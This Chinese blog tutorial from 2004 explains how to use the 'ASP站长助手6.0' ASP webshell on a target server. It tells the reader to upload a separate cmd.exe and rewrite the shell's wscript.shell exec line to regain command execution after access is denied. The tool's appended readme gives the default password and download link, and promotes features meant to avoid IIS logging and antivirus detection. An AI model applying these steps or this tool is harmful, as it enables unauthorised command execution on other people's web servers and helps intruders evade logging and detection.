使用ASP站长助手6.0提升webshll中cmd权限图文教程

本文介绍了ASP站长助手6.0的使用方法。先将dbm6.asp文件上传到目标,从浏览器打开并输入初始密码,点击命令行模块会显示“拒绝访问”。接着用文件上传模块上传CMD.exe,修改wdbm6.asp中调用CMD.exe的代码,重新上传覆盖原文件,再次点击命令行模块即可看到黑白画面。
黑色诱惑
1.将ASP站长助手6.0的dbm6.asp文件上传到目标。

2.从浏览器中打开上传的dbm6.asp,输入初始密码:gxgl.com


3.这个时候在ASP站长助手6.0点击命令行模块,显示"拒绝访问"


4.用ASP站长助手6.0的文件上传模块上传一个本地的CMD.exe,到你的目标主机。


5.用记事本打开修改你的wdbm6.asp找到调用CMD.exe的代码
原来的:
SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall
修改成:
SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径 /c "&DefCmd).stdout.readall
比如我这里上传到的目录是D:/cmd.exe那么就修改成:
SI=SI&server.createobject("wscript.shell").exec("D:/cmd.exe /c "&DefCmd).stdout.readall
保存后重新上传到目标主机覆盖原来的dbm6.asp。


6.这个时候在ASP站长助手6.0点击命令行模块,呵呵,看看到久违的黑白画面了吧~~~



 [这是昨天QQ上一位叫小学徒的朋友问我的问题,我今天就专门去下了一个来用,然后在这里告诉他使用的方法,水平有限,写得很简陋,不知道大家能看懂不]
                                                                                                                                                ileboy
                                                                                                                                           2004/11/4

欢迎使用桂林老兵站出品的“ASP站长助手”,请注意你手中的版本是否为最新版。 为了安全,本工具的登录方式为手工输入地址:在文件名后加上?action=login 版本:6.0 更新:2004-11-8 22:58 大小:30.4 KB (31,201 字节) 功能: 文件管理模块: 文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ACCESS数据库建立/压缩/操作; 以及常见数据库(MSSQL,MYSQL,DSN)的操作,附有操作示例代码; 命令行执行模板: 执行命令行程序,并回显。可以用来压缩目录来下载; 服务器支持组件信息查看 强调:本版本去掉了相对路径连接方式,全部采用绝对路径; 文件操作和上传时要输的路径为文件的全路径:盘符:\目录\文件名.扩展名; 目录操作时要输的路径为目录的全路径:盘符:\目录; ACCESS文件数据库的路径为文件的全路径:盘符:\目录\文件名.扩展名,请看示例代码; 优点:做到了真正的图形化操作,文件和目录的显示会有相应的图标显示; 操作时所产生的文件名,SQL操作符等参数全部采用POST来提交,不会在IIS日志中有记录; 对OBJECT进行了变形处理。一般不会被杀毒软件查杀。 可以自定义CMDSHELL的执行程序路径。 配置: ApplicationName = "Asp站长助手6.0" '#####程序名称/标题 UserPass = "gxgl.com" '#####初始登录密码 ShowFileIco = True '#####是否显示图标,False为用文字图标 IcoPath = "http://www.GXGL.com/images/FileType/" '#####图标目录,不必修改 附加:Filetype.rar备用图标目录。如果你是用来管理自己的网站的话,那么这个目录放在自己的空间上比较好管理。 用法:将dbm6.asp上传到支持ASP的空间上即可。连接时要在文件名后面手工加上action=login才能登录 操作数据库时请先连接显示表名后再输入SQL命令,不然会出错的。 默认在浏览数据库内容时每个字段最多只显示五十个字节。 要想浏览超过五十个字节的字段。可以这么做。 当只显示一条数据时就会显示全部字节了。可以通过SQL语言来控制。 如想全部显示ID为972的行的content字段的内容,可以这么构造SQL语句: select [content] from [article] where id=972 说明:文件操作使用的是FSO组件,上传使用的是ADODB.STREAM。 --------------------------------------------------------------------------------------------- 下载:http://www.gxgl.com/soft/dbm6.rar 作者:桂林老兵 网站:http://www.gxgl.com http://www.gxgl.net Q Q: 442331 Email: net@gxgl.com
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值